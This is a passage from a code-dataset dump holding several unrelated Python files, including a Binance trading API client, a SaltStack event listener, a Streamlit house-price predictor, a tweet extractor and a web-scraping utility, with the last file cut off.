see_ardoise(name):\n a = open_file() \n for i in a:\n if i[1] == name:\n can = (ceil(100*(i[2]*0.6)))/100\n gat = (ceil(100*(i[3]*0.8)))/100\n aut = (ceil(100*(i[4])))/100\n tot = (ceil((can + gat + aut)*100))/100\n return (\"Tu dois \" + str(tot) + \"$\")\n\ndef wipe(name):\n a = open_file()\n for i in a:\n if i[1] == name:\n i[2] = 0\n i[3] = 0\n i[4] = 0\n write_file(a)\n\n\n\n","sub_path":"telecyc.py","file_name":"telecyc.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"608643656","text":"x,l=map(int,input().split())\nc=0\nfor i in range(x,l+1):\n if(i>1):\n for v in range(2,i):\n if(i%v==0):\n break\n else:\n c+=1\nprint(c) \n\n","sub_path":"player9.py","file_name":"player9.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"602750535","text":"\r\n\r\nimport os\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nos.chdir('C:\\PANDAS\\practicaltimeseries\\data')\r\nos.getcwd()\r\n\r\nsp500_df = pd.read_csv('GSPC.csv')\r\n\r\n# Change the row indices of the dataframe using the Date column\r\nsp500_df.index = sp500_df['Date']\r\n\r\nprint(sp500_df.head(10))\r\n\r\n\r\nos.chdir('C:\\PANDAS2019\\plots_out')\r\nplt.figure(figsize=(5.5, 5.5))\r\nsp500_df['Close'].plot(color='b')\r\nplt.title('S&P 500 between 2001 - 2018')\r\nplt.xlabel('Time')\r\nplt.ylabel('Closing Value')\r\nplt.savefig('sp500_20190918.png', format='png', dpi=300)\r\n","sub_path":"stock_data_read_and_plot_out.py","file_name":"stock_data_read_and_plot_out.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"252824584","text":"# Location variables\r\ndataDir = \"location/of/feedback/directory/\" # Where feedback information will be stored\r\n\r\n# Processing variables\r\ncontinueFromLast = False # Whether or not to continue from the last-found population\r\nfeedbackInterval = 1 # Every so many generations, save feedback information\r\nmaxGenerations = 10 # Maximum number of generations. 'None' will run indefinately.\r\n\r\n# Mutatable variables\r\nmutationRate = 0.1 # Larger than 1. How often a DNA mutation occurs per offspring.\r\ncrossoverRate = 0.9 # Larger than 1. How often crossover occurs between parental DNA.\r\ntournamentSize = 5 # How large of a tournament occurs to find best-fitness mate.\r\n\r\n# Semi-static variables\r\npopulationSize = 30 # Number of individuals in a population.\r\ncodonRange = 1000 # How many different numbers are available per codon in DNA.\r\nnumberHiddenNeurons = 10 # How many neurons there are in the first neural layer per neural network.\r\nnumberGames = 30 # How many games of prisoner's dilemma are played per match.\r\n\r\n# Graph variables\r\nnumberChunks = 50 # How many averages are calculated per variable\r\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"301492982","text":"import os\nimport re\n\nimport numpy as np\n\nfrom config import DATA_DIR\n\ndef _parse_claim(input_line):\n\t\"\"\"\n\tParses a claim of the format \"#1305 @ 400,523: 25x10\" and returns\n\tthe claim details as a dict with ['id', 'x', 'y', 'w', 'h'] as the\n\tkeys.\n\n\tInputs -\n\t\tinput_line - a claim of format \"#id @ x,y: wxh\"\n\n\tReturns -\n\t\tclaim_details - a dict with ['id', 'x', 'y', 'w', 'h'] as the\n\t\t\tkeys, and their respective values.\n\t\"\"\"\n\tclaim_keys = ['id', 'x', 'y', 'w', 'h']\n\tclaim_details = re.compile(r'[#@,:x]+').split(input_line)\n\tclaim_details.remove('')\n\tclaim_details = [int(detail.strip()) for detail in claim_details]\n\tclaim_dict = dict([(claim_keys[ix], claim_details[ix])\n\t\t\t\t\t\tfor ix, _ in enumerate(claim_details)])\n\treturn claim_dict\n\ndef _get_input_list(input_file_name):\n\tinput_data_file = os.path.join(DATA_DIR, input_file_name)\n\twith open(input_data_file, 'r') as fp:\n\t\tinput_data = [_parse_claim(line.strip()) for line in fp]\n\treturn input_data\n\ndef _get_fabric_with_claims(claims):\n\t\"\"\"\n\tGets the claims, iterates over them, and mark the fabric with the\n\tpossible overlaps. Any overlap is marked with a -1.\n\n\tInputs -\n\t\tclaims - a list of dicts, each dict representing a claim. Same\n\t\t\tdict as returned by _parse_claim().\n\n\tReturns -\n\t\tfabric - an np.array with claim_id in each square inch and\n\t\t\t-1 in overlapping areas.\n\t\"\"\"\n\tfabric = np.zeros((1000, 1000))\n\tfor claim in claims:\n\t\tx, y, w, h = claim['x'], claim['y'], claim['w'], claim['h']\n\t\tpatch = fabric[x: x + w, y: y + h]\n\t\tpatch[patch != 0] = -1\n\t\tpatch[patch == 0] = claim['id']\n\treturn fabric\n\ndef one():\n\tclaims = _get_input_list('day_three.txt')\n\tfabric = _get_fabric_with_claims(claims)\n\treturn (fabric == -1).sum()\n\ndef two():\n\tclaims = _get_input_list('day_three.txt')\n\tfabric = _get_fabric_with_claims(claims)\n\tfor claim in claims:\n\t\tx, y, w, h = claim['x'], claim['y'], claim['w'], claim['h']\n\t\tpatch = fabric[x: x + w, y: y + h]\n\t\toverlapping_square_inches = (patch == -1).sum()\n\t\tif not overlapping_square_inches:\n\t\t\treturn claim['id']\n","sub_path":"day_three.py","file_name":"day_three.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"338973495","text":"\"\"\"Example of using 'ping' command, device & connection integration\nwhen given a device object\"\"\"\n\nfrom ats.topology import loader\nfrom ats import topology\n\ntestbed = topology.loader.load('''\ndevices:\n vm424583:\n os: 'linux'\n tacacs:\n username: mshumakov\n passwords:\n linux: mykola00\n connections:\n linux:\n protocol: ssh\n ip: 192.168.242.44\n type: 'linux'\n ''')\n\ndevice = testbed.devices['vm424583']\ntest_ip = '108.177.119.103'\n\n# users should be able to directly interface with it, eg:\n# connect to it\ndevice.connect()\n\n# send commands\noutput = device.execute('hostname')\ndevice.ping(test_ip)\n\nassert output in testbed\n\n# disconnect from device\ndevice.disconnect()\n","sub_path":"case_8/topology_ping.py","file_name":"topology_ping.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"277609963","text":"\n# part of the code originally created by Nicklas Østertgaard nvo@bimshark.com / nvo@shl.fk and/or Augusto Goncalves (AEC Devblog)\n# Workset management, loop, pin and site location settings by Jonathan ATGER (jonathan.atger@yahoo.fr)\n\nimport clr\n\n# Import ToDSType(bool) extension method\nclr.AddReference(\"RevitNodes\")\nimport Revit\nclr.ImportExtensions(Revit.Elements)\n\n# Import DocumentManager and TransactionManager\nclr.AddReference(\"RevitServices\")\nimport RevitServices\nfrom RevitServices.Persistence import DocumentManager\nfrom RevitServices.Transactions import TransactionManager\nfrom System.Collections.Generic import *\n\n# Import RevitAPI\nclr.AddReference(\"RevitAPI\")\nimport Autodesk\nfrom Autodesk.Revit.DB import *\n\nimport sys\npyt_path = r'C:\\Program Files (x86)\\IronPython 2.7\\Lib'\nsys.path.append(pyt_path)\nimport System\n\ndoc = DocumentManager.Instance.CurrentDBDocument\n\n# Start Transaction\nTransactionManager.Instance.EnsureInTransaction(doc)\n\nif isinstance(IN[0], list) : in_links = IN[0] \nelse : in_links = [IN[0]]\n\nif isinstance(IN[1], list) : in_ws = IN[1] \nelse : in_ws = [IN[1]]\n\n# number of elements\ntry : numlinks = len(in_links)\nexcept : OUT = 'append link'\n\t\ntry : numworksets = len(in_ws)\nexcept : numworksets = 0\n\n#check list lengths\nif numlinks == numworksets : listlength = True\nelse : listlength = False\n\ndef linkmodel (fpath, options, doc, pin) :\n\t# Create the Revit Link Type\n\tmp = ModelPathUtils.ConvertUserVisiblePathToModelPath(fpath)\n\tlnkOp = RevitLinkOptions(options)\n\tloadedLnkType = RevitLinkType.Create(doc, mp, lnkOp)\n\t\n\t# Create the Revit Link Instance \n\tlnkInstance = RevitLinkInstance.Create(doc, loadedLnkType.ElementId, ImportPlacement.Shared)\n\t\n\t#Pin link\n\tlnkInstance.Pinned = pin\n\treturn lnkInstance\n\ntry:\n\t# Number of worksets input and filepaths input are different\n\tif IN[1] and listlength == False :\n\t\tOUT = \"The number of worksets doesn't match the number of links\"\n\t\t\n\t\t\n\t# Multiple Worksets input\n\telif IN[1] and listlength == True :\n\t\n\t\t#Get WorksetTable and current workset\n\t\twstable = doc.GetWorksetTable()\n\t\tactivewsid = wstable.GetActiveWorksetId()\n\t\t\n\t\t#Create list for output\n\t\tlinks = []\n\t\t\n\t\tfor fpath, ws in zip(in_links, in_ws) :\n\t\t\n\t\t\t# Get WorksetId\n\t\t\twssimpleid = ws.Id\n\t\t\twsid = WorksetId(wssimpleid)\n\t\t\t\t\n\t\t\t# Set the workset\n\t\t\tWorksetTable.SetActiveWorksetId(wstable, wsid)\n\t\t\t\n\t\t\t# Create the Revit Link Type and Link Instance\n\t\t\ta = linkmodel(fpath,\"\", doc, IN[2])\n\t\t\t\n\t\t\t#add created link to output\n\t\t\tlinks.append(a)\n\t\t\t\t\t\t\t\n\t\t#reset current workset\t\n\t\tWorksetTable.SetActiveWorksetId(wstable, activewsid)\n\t\t\n\t\t#output\n\t\tOUT = links\t\n\n\t# No worksets input\n\telse :\n\t\tlinks = []\n\t\tfor fpath in in_links :\n\t\t\ta = linkmodel(fpath, \"\", doc, IN[2])\n\t\t\tlinks.append(a)\n\t\tOUT=links\n\t\nexcept:\n # if error accurs anywhere in the process catch it\n import traceback\n errorReport = traceback.format_exc()\n OUT = errorReport \n\n# End Transaction\nTransactionManager.Instance.TransactionTaskDone()\n\n","sub_path":"Python/LinkModel.SharedCoordinates.py","file_name":"LinkModel.SharedCoordinates.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"77511146","text":"\"\"\"Post urls\"\"\"\n\n# Django \nfrom django.urls import path\n\n# Views\nfrom posts import views \n\nurlpatterns = [\n path('', views.PostFeedView.as_view(), name='posts'),\n path('posts/new/', views.PostCreateView.as_view(), name='new_post'),\n path('posts/', views.PostDetailView.as_view(), name='detail_post'),\n]\n","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"485599028","text":"import re\nimport json\n\n\"\"\"\nCode to parse the gps data returned by Fona module\n\n@author Pankaj Meghnai \n@date 30 July, 2021\n\"\"\"\n\nclass GPS_Parser:\n def __init__(self, string):\n regex_exp = r\"CGPSINFO:([\\d.]*)(?:,?)([NS]?)(?:,?)([\\d.]*),([EW]?),\\d*,[\\d.]*,([\\d.]*),([\\d.]*),(\\d*)\"\n\n matches = re.search(regex_exp, string)\n is_okay = re.search(r'\\b(OK)\\b', string)\n\n seperator = '.'\n\n if (is_okay == None):\n okay = False\n latitude = longitude = altitude = speed = course = None\n else:\n okay = True\n\n latitude = matches.group(1)\n latitude = latitude[:2]+seperator+latitude[2:4]+latitude[5:]\n if (matches.group(2) == 'S'):\n latitude = '-'+latitude\n\n longitude = matches.group(3)\n longitude = longitude[:3]+seperator+longitude[3:5]+longitude[6:]\n if (matches.group(4)=='W'):\n longitude = '-'+longitude\n\n altitude = matches.group(5)\n speed = matches.group(6)\n course = matches.group(7)\n\n self.okay = okay\n self.latitude = latitude\n self.longitude = longitude\n self.altitude = altitude\n self.speed = speed\n self.course = course\n\n def __str__(self):\n return ' '.join([\n str(self.okay),\n self.latitude,\n self.longitude,\n self.altitude,\n self.speed,\n self.course\n ])\n\n def toJSON(self):\n return json.dumps(self, default=lambda o: o.__dict__,\n sort_keys=True, indent=4)\n\n","sub_path":"Revision 2/GPS_Parser.py","file_name":"GPS_Parser.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"78222278","text":"import numpy as np \nimport matplotlib.pyplot as plt\nfrom cvxpy import *\nimport seaborn as sns\nsns.set_style('whitegrid')\n\n# multireservoir problem from Heidari et al. 1971\n# the beginning is all data setup\n\nT = 12\n\nX = Variable(T+1, 4)\nU = Variable(T, 4)\n\n# benefits matrix from paper\nB = np.array([[1.1,1.4,1.0,1.0,1.6],\n [1.0,1.1,1.0,1.2,1.7],\n [1.0,1.0,1.2,1.8,1.8],\n [1.2,1.0,1.8,2.5,1.9],\n [1.8,1.2,2.5,2.2,2.0],\n [2.5,1.8,2.2,2.0,2.0],\n [2.2,2.5,2.0,1.8,2.0],\n [2.0,2.2,1.8,2.2,1.9],\n [1.8,2.0,2.2,1.8,1.8],\n [2.2,1.8,1.8,1.4,1.7],\n [1.8,2.2,1.4,1.1,1.6],\n [1.4,1.8,1.1,1.0,1.5]])\n\n# reservoir connectivity matrix\nM = np.array([[-1,0,0,0],\n [0,-1,0,0],\n [0,1,-1,0],\n [1,0,1,-1]])\n\n# inflows (constant)\ny = np.zeros((T,4))\ny[:,0] = 2\ny[:,1] = 3\n\n# storage upper bound\nXUB = 10*np.ones((T+1,4))\nXUB[:,3] = 15\nUUB = 4*np.ones((T,4))\nUUB[:,0] = 3\nUUB[:,3] = 7\n\n# objective function (hydropower plus ag benefit)\nobj = Maximize(B[:,0].T*U[:,0] + B[:,1].T*U[:,1] \n + B[:,2].T*U[:,2] + B[:,3].T*U[:,3] + B[:,4].T * U[:,3])\n\n# mass balance constraint in matrix form\nc_mass_balance = [X[1:,:] == X[:-1,:] + y + U*M.T]\nc_nonneg = [U >= 0, X >= 0] # release lower/upper bounds\nc_ub = [X <= XUB, U <= UUB]\nc_init_final = [X[0,:] == 5, X[T,:] >= np.array([[5,5,5,7]])]\nconstraints = c_mass_balance + c_nonneg + c_ub + c_init_final\n\nprob = Problem(obj, constraints)\nprob.solve()\n\nprint('Status: %s' % prob.status)\nprint('Obj Fun: %f' % obj.value)\n\nfor i in range(4):\n plt.subplot(2,2,i+1)\n plt.plot(X[:,i].value)\n plt.ylim([0,10])\n plt.title('Reservoir %d' % (i+1))\n\nplt.show()\n","sub_path":"L13-multireservoir-heidari.py","file_name":"L13-multireservoir-heidari.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"387404528","text":"import streamlit as st\r\nimport pickle\r\nimport nltk\r\nnltk.data.path.append('./nltk_data/')\r\nimport string\r\nfrom nltk.corpus import stopwords\r\n\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport re\r\n\r\nlemmatizing=WordNetLemmatizer()\r\ndef transform_text(text):\r\n text = text.lower()\r\n text=re.sub('[^a-zA-Z]',' ',text)\r\n text = nltk.word_tokenize(text)\r\n y = []\r\n text=[lemmatizing.lemmatize(word) for word in text if not word in set(stopwords.words('english'))]\r\n text=' '.join(text)\r\n y.append(text)\r\n y=' '.join(y)\r\n return y\r\n\r\nbow = pickle.load(open('vectorizer.pkl','rb'))\r\nmodel = pickle.load(open('model.pkl','rb'))\r\nst.title(\"Sukku Email/SMS Spam Classifier\")\r\n\r\ninput_sms = st.text_area(\"Enter the message to check with 98% accuracy\")\r\n\r\nif st.button('Predict'):\r\n\r\n # 1. preprocess\r\n transformed_sms = transform_text(input_sms)\r\n # 2. vectorize\r\n vector_input = bow.transform([transformed_sms])\r\n # 3. predict\r\n result = model.predict(vector_input)[0]\r\n # 4. Display\r\n if result == 1:\r\n st.header(\"Spam\")\r\n else:\r\n st.header(\"Not Spam\")","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"469036618","text":"import sys\n\nresources = []\n\n\ndef error(msg, code):\n sys.stderr.write(msg + '\\n')\n if code == 64:\n sys.stderr.write('\\nUse \"python mcbuild.py -h\" to see the syntax\\n')\n for res in resources:\n res.__exit__()\n exit(code)\n\n\ndef parse_args():\n args = []\n opts = []\n\n for arg in sys.argv[1:]:\n if arg[0] == '-':\n if arg[1] == '-':\n opts.append(arg[2:])\n else:\n for c in arg[1:]:\n opts.append(c)\n else:\n args.append(arg)\n\n return args, opts\n\n\ndef deflate(line):\n parts = line.split('\"')\n return '\"'.join(map(lambda i, val: ''.join(val if i % 2 else ['' if c.isspace() else c for c in val]), range(len(parts)), parts))\n\n\ndef escape(text):\n s = ''\n for c in text:\n if c in ('\\\\', '\"'):\n s += '\\\\'\n s += c\n return s\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"20960020","text":"from DLinkedList import DList\nfrom dynamicArray import DynamicArray\n\n\ndef radix_sort_int(sort_list, max):\n arr = DynamicArray(10)\n for i in range(len(arr.array)):\n arr.array[i] = DList()\n digit = 1\n while digit <= max:\n print(\"================= Ordering by \" + str(digit) + \"'s ======================\")\n for j in sort_list:\n arr.array[(j // digit) % 10].Append(x=j)\n i = 0\n for k in arr.array:\n start = k.head\n if start is not None:\n while not k.IsEmpty():\n print(start.data)\n temp = start.next\n sort_list[i] = k.Remove(start.data)\n start = temp\n i += 1\n digit *= 10\n return sort_list\n\n\ndef radix_sort_string(a, max):\n arr = DynamicArray(37)\n for i in range(len(arr.array)):\n arr.array[i] = DList()\n\n for i in range(max):\n print(\"================= Ordering by \" + str(i+1) + \"place ======================\")\n for item in a:\n if len(item) > (max - (max - i)):\n # print(item[i], end=\"\")\n arr.array[ord(item[max-(max-len(item))-(i+1)].lower())-96].Append(x=item)\n else:\n # print(\"-\", end=\"\")\n arr.array[0].Append(x=item)\n h = 0\n for k in arr.array:\n start = k.head\n if start is not None:\n while not k.IsEmpty():\n print(start.data)\n temp = start.next\n a[h] = k.Remove(start.data)\n start = temp\n h += 1\n return a\n","sub_path":"Lab 2/RadixSort.py","file_name":"RadixSort.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"547965413","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n'''\n***********************************************************\n* Author : Zhou Wei *\n* Date : 2020/09/08 11:04:28 *\n* E-mail : welljoea@gmail.com *\n* Version : -- *\n* You are using the program scripted by Zhou Wei. *\n* If you find some bugs, please *\n* Please let me know and acknowledge in your publication. *\n* Thank you! *\n* Best wishes! *\n***********************************************************\n'''\nimport pybedtools as bt\nimport pandas as pd\nimport numpy as np\nimport re\nimport os\nimport sys\n'''\npd.set_option('display.max_rows', 100000)\npd.set_option('display.max_columns', 100000)\npd.set_option('display.width', 100000)\n'''\n\nclass MergePeaks():\n def __init__(self, arg, log, *array, **dicts):\n self.arg = arg\n self.log = log\n self.array = array\n self.dicts = dicts\n self.head_n = ['chr', 'start', 'end', 'name', 'score', 'strand', 'signalValue', 'pvalue', 'qvalue', 'peak']\n self.merg_n = ['chr', 'start', 'end', 'starts', 'ends', 'name', 'score', 'strand', 'signalValue', 'pvalue', 'qvalue', 'peak', 'sample']\n self.bedfiles = [i.strip() for i in re.split( '[,;@]', self.arg.bedfiles )]\n if self.arg.IDs == 'infer':\n self.IDs = [ '_'.join( os.path.basename(i).split('_')[:-1] ) for i in self.bedfiles ]\n else:\n self.IDs = [i.strip() for i in re.split( '[,;@]', self.arg.IDs )]\n if len(self.IDs) != len(self.bedfiles):\n self.log.CW(\"the bedfile length is not equal with the IDs's.\")\n sys.exit(0)\n\n def BTmerge(self, peaktype='narrow'):\n Beddf = []\n for i in range(len(self.bedfiles)):\n k = pd.read_csv(self.bedfiles[i], sep='\\t',header=None)\n k.insert(10, 10, self.IDs[i] )\n Beddf.append(k)\n Beddf = bt.BedTool.from_dataframe( pd.concat(Beddf, axis=0) )\n #Bedsort = bt.BedTool(self.bedfiles[0])\n #Bedsort = Bedsort.cat(*self.bedfiles[1:], postmerge=False)\n Beddf = Beddf.sort()\\\n .merge( c=','.join([ str(i) for i in range(2,12)]),\n o=','.join(['collapse']*10))\\\n .to_dataframe(disable_auto_names=True, header=None,names=self.merg_n)\n Beddf.to_csv('%s/merge.peaks_bedtools.xls'%(self.arg.outdir), sep='\\t', header=True,index=False)\n return Beddf\n\n def Peakpivot(self):\n pass\n\n\nclass Pipeline():\n 'The pipeline used for machine learning models'\n def __init__(self, arg, log, *array, **dicts):\n self.arg = arg\n self.log = log\n self.array = array\n self.dicts = dicts\n\n def Pipe(self):\n\n if self.arg.commands in ['mergepeak', 'Auto']:\n MergePeaks(self.arg, self.log).BTmerge()\n\nimport argparse\ndef Args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n prefix_chars='-+',\n conflict_handler='resolve',\n description=\"\",\n epilog=\"\")\n\n parser.add_argument('-V','--version',action ='version',\n version='ATACtools version 0.1')\n\n subparsers = parser.add_subparsers(dest=\"commands\",\n help='models help.')\n P_Common = subparsers.add_parser('Common',conflict_handler='resolve', #add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help='The common parameters used for other models.')\n P_Common.add_argument(\"-i\", \"--input\",type=str,\n help='''the input file. 
You can use comma, semicolon or at to split multiple files''')\n    P_Common.add_argument(\"-o\", \"--outdir\",type=str,default=os.getcwd(),\n                help=\"output file dir, default=current dir.\")\n    P_Common.add_argument(\"-p\", \"--prefix\",type=str,default='',\n                help=\"output file header, default=None.\")\n\n    P_mgpeak = subparsers.add_parser('mergepeak', conflict_handler='resolve', add_help=False)\n    P_mgpeak.add_argument(\"-B\", \"--bedfiles\", type=str,\n                help=\"Input bed files. You can use comma, semicolon or at to split multiple files\")\n    P_mgpeak.add_argument(\"-I\", \"--IDs\", type=str, default='infer',\n                help=\"Input ID. The ID is in agreement with the input file by order and number. You can use comma, semicolon or at to split multiple files\")\n    P_mgpeak.add_argument(\"-mp\", \"--mergepara\", type=str, default='',\n                help=\"the bedtools merge parameters.\")\n    P_mgpeak.add_argument(\"-ps\", \"--peaksoft\", type=str, default='macs', choices=['macs','genrich'],\n                help=\"the software used to call peaks, such as macs, genrich.\")\n    P_mgpeak.add_argument(\"-pt\", \"--peaktype\", type=str, default='narrow', choices=['narrow','broad'],\n                help=\"the type of called peaks, such as narrow, broad.\")\n    P_Mgpeak = subparsers.add_parser('mergepeak',conflict_handler='resolve',\n                formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n                parents=[P_Common,P_mgpeak],\n                help='merge peaks.')\n\n    P_Autopipe = subparsers.add_parser('Auto', conflict_handler='resolve', prefix_chars='-+',\n                formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n                parents=[P_Common, P_mgpeak],\n                help='the auto-processing for all.')\n    P_Autopipe.add_argument(\"+P\", \"++pipeline\",nargs='+',\n                help=\"the auto-processing: standardization, feature selection, Fitting and/or Prediction.\")\n    P_Autopipe.add_argument('+M','++MODEL' , nargs='+', type=str, default=['Standard'],\n                help='''Choose one or more models from Standard, Fselect, Fitting and Predict for the DIY pipeline.''')\n    args = parser.parse_args()\n    return args\n\n\nimport logging\nclass DispatchingFormatter:\n    def __init__(self, formatters, default_formatter):\n        self._formatters = formatters\n        self._default_formatter = default_formatter\n\n    def format(self, record):\n        formatter = self._formatters.get(record.name, self._default_formatter)\n        return formatter.format(record)\n\nclass Logger:\n    level_dict = {\n        'NOTSET'  : logging.NOTSET,\n        'DEBUG'   : logging.DEBUG,\n        'INFO'    : logging.INFO,\n        'WARNING' : logging.WARNING,\n        'ERROR'   : logging.ERROR,\n        'CRITICAL': logging.CRITICAL,\n    }\n\n    ChangeFrom = DispatchingFormatter(\n        { 'c' : logging.Formatter( '[%(asctime)s] [%(levelname)-4s]: %(message)s', '%Y-%m-%d %H:%M:%S'),\n          'p' : logging.Formatter( '[%(levelname)-4s]: %(message)s'),\n          'n' : logging.Formatter( '%(message)s' ),\n        }, \n        logging.Formatter('%(message)s')\n    )\n\n    def __init__(self, outpath, filemode='w', clevel = 'INFO', Flevel = 'INFO'):\n\n        logging.basicConfig(\n            level    = Logger.level_dict[clevel] ,\n            format   = '[%(asctime)s] [%(levelname)-4s]: %(message)s',\n            datefmt  = '%Y-%m-%d %H:%M:%S',\n            filename = None,\n        )\n\n        File = logging.FileHandler(outpath, mode= filemode)\n        File.setLevel(Logger.level_dict[Flevel])\n        File.setFormatter(Logger.ChangeFrom)\n        logging.getLogger().addHandler(File)\n\n        self.R = logging\n        self.C = logging.getLogger('c')\n        self.P = logging.getLogger('p')\n        self.N = logging.getLogger('n')\n        self.CI = logging.getLogger('c').info\n        self.NI = logging.getLogger('n').info\n        self.CW = logging.getLogger('c').warning\n        self.NW = logging.getLogger('n').warning\n\nimport 
os\nimport time\nimport traceback\ndef Commands():\n info ='''\n>^o^<\n***********************************************************\n* Author : Zhou Wei *\n* Date : %s *\n* E-mail : welljoea@gmail.com *\n* You are using the program scripted by Zhou Wei. *\n* If you find some bugs, please email to me. *\n* Please let me know and acknowledge in your publication. *\n* Sincerely *\n* Best wishes! *\n***********************************************************\n'''%(time.strftime(\"%a %b %d %H:%M:%S %Y\", time.localtime()))\n\n args = Args()\n os.makedirs( args.outdir, exist_ok=True ) # create the output dir before the Logger opens its file there\n Log = Logger( '%s/%s_log.log'%(args.outdir, args.commands) )\n\n Log.NI(info.strip())\n Log.NI(\"The arguments you have set are as follows:\".center(59, '*'))\n for i,k in enumerate(vars(args),start=1):\n Log.NI('**%s|%-13s: %s'%(str(i).zfill(2), k, str(getattr(args, k))) )\n Log.NI(59 * '*')\n\n try:\n Pipeline(args, Log).Pipe()\n Log.CI('Success!!!')\n except Exception:\n Log.CW('Failed!!!')\n traceback.print_exc()\n finally:\n Log.CI('You can check your progress in the log file.')\nCommands()","sub_path":"ATACtools2.py","file_name":"ATACtools2.py","file_ext":"py","file_size_in_byte":9241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
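The record above routes log records to different formats by logger name through its DispatchingFormatter. A minimal standalone sketch of that pattern (the logger names 'c' and 'n' mirror the script above; the handler setup here is illustrative, not the original):

```python
import logging

class DispatchingFormatter:
    """Pick a formatter based on the logger name, falling back to a default."""
    def __init__(self, formatters, default_formatter):
        self._formatters = formatters
        self._default_formatter = default_formatter

    def format(self, record):
        return self._formatters.get(record.name, self._default_formatter).format(record)

handler = logging.StreamHandler()
handler.setFormatter(DispatchingFormatter(
    {'c': logging.Formatter('[%(levelname)s] %(message)s'),
     'n': logging.Formatter('%(message)s')},
    logging.Formatter('%(message)s'),
))
root = logging.getLogger()
root.addHandler(handler)
root.setLevel(logging.INFO)

# Named loggers propagate to the root handler, which then picks a format per name.
logging.getLogger('c').info('prefixed line')   # -> [INFO] prefixed line
logging.getLogger('n').info('bare line')       # -> bare line
```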
+{"seq_id":"485471011","text":"#! python3\n\"\"\"Write a program to invert the row and column of the cells in the spreadsheet.\nFor example, the value at row 5, column 3 will be at row 3, column 5 (and vice versa).\nThis should be done for all cells in the spreadsheet.\"\"\"\n\nimport openpyxl\n\n\ndef invert_cells(xls_file):\n \"\"\"Invert rows and columns in a spreadsheet.\"\"\"\n wb1 = openpyxl.load_workbook(xls_file)\n sheet1 = wb1.active\n\n sheet_data = []\n for x in range(1, sheet1.max_row):\n rows = []\n for y in range(1, sheet1.max_column+1):\n rows.append(sheet1.cell(row=x, column=y).value)\n sheet_data.append(rows)\n\n inverted_data = [list(x) for x in zip(*sheet_data)]\n\n wb2 = openpyxl.Workbook()\n sheet2 = wb2.active\n for i in range(len(inverted_data)):\n sheet2.append(inverted_data[i])\n\n wb2.save('inverted.xlsx')\n\ndef main():\n xls_file = 'example.xlsx'\n invert_cells(xls_file)\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n","sub_path":"Chapter_12-Working_with_Excel_Spreadsheets/spreadsheet_cell_inverter.py","file_name":"spreadsheet_cell_inverter.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"233454511","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright © 2016 tejas \n#\n# Distributed under terms of the MIT license.\n\nres=[]\nfreq={}\nnum=[ \"ZERO\", \"ONE\", \"TWO\", \"THREE\", \"FOUR\", \"FIVE\", \"SIX\", \"SEVEN\", \"EIGHT\", \"NINE\"]\n\ndef subtract(x , index):\n\n while freq[x] > 0:\n res.append(index)\n for z in num[index] : freq[z]-=1\n\n\ndef main():\n testCases=int(input())\n for tc in range(testCases):\n\n global res,freq\n res[:]=[]\n freq.clear()\n\n s=input()\n for c in 'QWERTYUIOPASDFGHJKLZXCVBNM':\n freq[c]=0\n for c in s : \n freq[c]+=1\n \n subtract('Z',0)\n subtract('W',2)\n subtract('U',4)\n subtract('X',6)\n subtract('G',8)\n\n subtract('O',1)\n subtract('H',3)\n subtract('F',5)\n\n\n subtract('S',7)\n subtract('I',9)\n\n res.sort()\n print (\"Case #{}: \".format(tc+1),end='')\n for i in res:\n print (i,end='')\n print()\n\n\nmain()\n\n","sub_path":"codes/CodeJamCrawler/16_2_1/tejaspandey/digits.py","file_name":"digits.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
